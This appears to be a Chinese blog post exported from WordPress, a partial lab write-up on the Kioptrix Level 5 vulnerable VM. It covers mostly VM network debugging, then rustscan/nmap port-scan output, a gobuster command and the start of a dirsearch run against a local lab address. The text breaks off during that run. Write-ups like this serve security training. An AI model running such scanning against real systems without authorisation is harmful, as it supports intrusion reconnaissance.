{"id":331,"date":"2024-01-29T22:18:51","date_gmt":"2024-01-29T14:18:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=331"},"modified":"2024-01-29T22:18:51","modified_gmt":"2024-01-29T14:18:51","slug":"kioptrix-level-5%ef%bc%88%e5%a4%b1%e8%b4%a5%ef%bc%89","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/331\/01\/29\/2024\/","title":{"rendered":"KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09"},"content":{"rendered":"<h1>KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217151.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128160520795\" \/><\/div><\/p>\n<h2>\u6f2b\u957f\u7684debug\uff08\u7f51\u5361\u65e0\u6cd5\u8fde\u63a5\/\u65e0\u6cd5\u83b7\u53d6IP\uff09<\/h2>\n<p>\u6253\u5f00\u73af\u5883\uff0c\u5982\u679c\u83b7\u53d6\u4e0d\u5230IP\u7684\u8bdd\uff0c\u53ef\u4ee5\u4fee\u6539\u4e00\u4e0b<code>.vmx<\/code>\uff0c\u5c06\u6865\u63a5\u6a21\u5f0f\u6539\u4e3a<code>NAT<\/code>\uff0c\u6253\u5f00\u4ee5\u540e\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217152.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217152.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128163309166\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u626b\u4e00\u4e0b\uff0c\u4e0d\u9614\u4ee5\u626b\u5230\u3002\u3002\u3002\u3002\u90a3\u5c31\u6309\u4e0a\u4e00\u671f\u7684\u64cd\u4f5c\uff0c\u521b\u5efa\u865a\u62df\u673a\uff0c\u5220\u9664\u7f51\u5361\uff0c\u52a0\u8f7d\u7ed9\u7684\u7f51\u5361\u518d\u6b21\u5c1d\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217154.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217154.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128172543800\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f5c\u8005\u8bf4\u572810\u4e0a\u767e\u5206\u767e\u652f\u6301\u7684\uff0c\u4e0d\u8282\u5916\u751f\u679d\u4e86\uff08\u5b9e\u9645\u4e0a\u8e29\u5751\u4e86\uff0c\u5047\u88c5\u6ca1\u8e29\uff09\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217155.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217155.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128172843901\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u5bc4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217156.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217156.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128173253191\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u51fa\u6765\u4e00\u70b9\u70b9\u3002\u3002\u3002\u3002\u518d\u5c06\u539f\u6709\u7684<code>.vmx<\/code>\u6253\u5f00\uff0c\u7136\u540e\u5c06\u786c\u76d8\u5220\u9664\uff0c\u91cd\u65b0\u6dfb\u52a0\uff0c\u51fa\u73b0\u4e86\u4ee5\u4e0b\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217157.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217157.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128174716317\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u641c\u7d22\uff0c\u641c\u5230\u4e86\u4e00\u7bc7\u7591\u4f3c[\u89e3\u7b54](<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/655396834\">Kioptrix: 2014 - \u77e5\u4e4e (zhihu.com)<\/a>)\uff0c\u8f93\u5165\u4e0b\u9762\u4ee3\u7801\u4ee5\u540e\uff0c\u987a\u5229\u6253\u5f00\uff1a<\/p>\n<pre><code class=\"language-bash\">ufs:\/dev\/ada0p2<\/code><\/pre>\n<p>\u4f46\u95ee\u9898\u8fd8\u662f\u6ca1\u6709\u5f97\u5230\u89e3\u51b3\u3002\u3002\u3002\u6309\u7167\u5b98\u7f51\u8fdb\u884c\u4fee\u6539\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217158.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217158.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128175851571\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u8fd9\u4e2a\u662f\u6211\u76f4\u63a5\u4fee\u6539\u7684\uff0c\u4e0d\u884c\uff0c\u5f97\u6309\u7167\u4e0b\u9762\u5b98\u65b9\u9776\u573a\u5199\u7684\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217159.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217159.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180132217\" \/><\/div><\/p>\n<p>\u51fa\u73b0\u62a5\u9519\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217160.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217160.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180557740\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5347\u7ea7\u523010\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217161.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217161.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128180700206\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6253\u5f00\uff0c\u8fd8\u662f\u641e\u4e0d\u4e86\u3002\u3002\u3002\u3002\u3002\u3002\u6de6\uff01\u653e\u98de\u81ea\u6211\uff0c\u778e\u51e0\u628a\u6539\u4e86\uff0c\u8fd9\u4e2a\u9776\u573a\u6682\u65f6\u505a\u4e0d\u4e86\uff0c\u5148\u4e0d\u641e\u4e86\u3002<\/p>\n<p>\u6ce8\u610f\u5230\u62a5\u9519\uff1a<code>vmware \u201dscsi0:0\u201c\u5df2\u65ad\u5f00<\/code>\uff0c\u641c\u7d22\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217162.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217162.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128181539665\" 
\/><\/div><\/p>\n<p>\u6211\u76f4\u63a5\u5c06\u6240\u6709\u7684\u914d\u7f6e\u5168\u90e8\u5220\u9664\u518d\u6dfb\u52a0\uff01<\/p>\n<p>\u7ed3\u679c\u53c8\u51fa\u4e86\u9519\u8bef<code>folppy()\u65ad\u5f00\u8fde\u63a5<\/code>\u8fd8\u6709<code>\u65e0\u6cd5\u8fde\u63a5\u865a\u62df\u8bbe\u5907 ide0:1\uff0c\u56e0\u4e3a\u4e3b\u673a\u4e0a\u6ca1\u6709\u76f8\u5e94\u7684\u8bbe\u5907\u3002<\/code><\/p>\n<p>\u6253\u5f00\u53d1\u73b0\u53ef\u4ee5\u626b\u5230\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217163.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217163.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128181942221\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u771f\u7684\u8981tu\u4e86\uff0c\u4e3a\u4e86\u4ee5\u9632\u4e07\u4e00\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u9776\u573a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217164.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217164.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240128182024288\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>work\u4e0d\u4e86\u4e00\u70b9\uff0c\u6211\u76f4\u63a5\u7ed9\u4f60\u4e00\u62f3\uff08\u5f00\u73a9\u7b11\u7684\uff0c\u8fd8\u662f\u611f\u8c22\u5e08\u5085\u8010\u5fc3\u505a\u9776\u573a\uff0c\u975e\u5e38\u611f\u8c22\uff01\uff01\uff01\uff09<\/p>\n<p>\u4e0b\u9762\u5f00\u59cb\u653b\u51fb\uff01<\/p>\n<blockquote>\n<p>\u8fd9\u91cc\u540e\u6765\u53d1\u73b0\u4f5c\u8005\u8bf4\u4e86\u4e00\u4e0b\u4ed6\u7684\u9776\u573a\u9700\u8981\u91cd\u65b0\u66f4\u6362\u7f51\u7edc\u9002\u914d\u5668\u3002<\/p>\n<\/blockquote>\n<h2>\u8e29\u70b9\u4e00\u4e0b<\/h2>\n<p>\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a<code>pChart 2.1.3<\/code>\u914d\u7f6e\uff0c\u67e5\u770b\u4e00\u4e0b<code>wappalyzer<\/code>\u5206\u6790\u51fa\u6765\u7684\u670d\u52a1\u5668\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;html&gt;\n &lt;head&gt;\n  &lt;!--\n  &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;5;URL=pChart2.1.3\/index.php&quot;&gt;\n  --&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;It works!&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217165.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217165.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129142514654\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709<code>robots.txt<\/code>\u6587\u4ef6\u3002<\/p>\n<h2>\u7aef\u53e3\u626b\u63cf<\/h2>\n<pre><code class=\"language-shell\">rustscan -a 192.168.244.144 --ulimit 5000\n# .----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n# | {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n# | .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n# `-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\n# The Modern Day Port Scanner.\n# ________________________________________\n# : https:\/\/discord.gg\/GFrQsGy           :\n# : https:\/\/github.com\/RustScan\/RustScan :\n#  --------------------------------------\n# Nmap? More like slowmap.\ud83d\udc22\n\n# [~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n# [~] Automatically increasing ulimit value to 5000.\n# Open 192.168.244.144:80\n# Open 192.168.244.144:8080\n# [~] Starting Script(s)\n# [&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)                                                                                                                         \n# [~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-29 01:27 EST                   \n# Initiating Ping Scan at 01:27                                                           \n# Scanning 192.168.244.144 [2 ports]                                                       \n# Completed Ping Scan at 01:27, 0.00s elapsed (1 total hosts)                             \n# Initiating Parallel DNS resolution of 1 host. at 01:27                                   \n# Completed Parallel DNS resolution of 1 host. 
at 01:27, 2.16s elapsed                     \n# DNS resolution of 1 IPs took 2.16s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]                                                                                 \n# Initiating Connect Scan at 01:27                                                         \n# Scanning 192.168.244.144 [2 ports]                                                       \n# Discovered open port 8080\/tcp on 192.168.244.144                                         \n# Discovered open port 80\/tcp on 192.168.244.144                                           \n# Completed Connect Scan at 01:27, 0.00s elapsed (2 total ports)                           \n# Nmap scan report for 192.168.244.144                                                     \n# Host is up, received syn-ack (0.00056s latency).                                         \n# Scanned at 2024-01-29 01:27:12 EST for 0s                                               \n# PORT     STATE SERVICE    REASON                                                         \n# 80\/tcp   open  http       syn-ack                                                       \n# 8080\/tcp open  http-proxy syn-ack                                                       \n# Read data files from: \/usr\/bin\/..\/share\/nmap                                             \n# Nmap done: 1 IP address (1 host up) scanned in 2.24 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>80<\/code>\u548c<code>8080<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217166.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217166.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129143231388\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217167.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217167.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129143258344\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u76ee\u5f55\u626b\u63cf<\/h2>\n<pre><code class=\"language-shell\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.144 -f -t 200\n# dir: \u6307\u793aGobuster\u6267\u884c\u76ee\u5f55\u626b\u63cf\u3002\n# -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt: \u6307\u5b9a\u7528\u4e8e\u626b\u63cf\u7684\u5b57\u5178\u6587\u4ef6\u7684\u8def\u5f84\u548c\u6587\u4ef6\u540d\u3002\n# -u http:\/\/192.168.244.144: \u6307\u5b9a\u8981\u626b\u63cf\u7684\u76ee\u6807URL\u3002\n# -f: \u5728\u8f93\u51fa\u4e2d\u663e\u793a\u5b8c\u6574\u7684URL\u8def\u5f84\u3002\n# -t 200: \u6307\u5b9a\u7ebf\u7a0b\u6570\uff0c\u8fd9\u91cc\u8bbe\u7f6e\u4e3a200\u3002<\/code><\/pre>\n<p>\u9047\u5230\u4e86\u62a5\u9519\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217168.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217168.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129150354641\" \/><\/div><\/p>\n<p>\u6362dirsearch\uff0c\u867d\u7136\u6ca1\u6709\u62a5\u9519\uff0c\u4f46\u662f\u4e5f\u4e00\u65e0\u6240\u83b7\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirsearch -u http:\/\/192.168.244.144\/ -e* -x 404,403 \n\/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https:\/\/setuptools.pypa.io\/en\/latest\/pkg_resources.html\n  from pkg_resources import DistributionNotFound, VersionConflict\n\n  _|. 
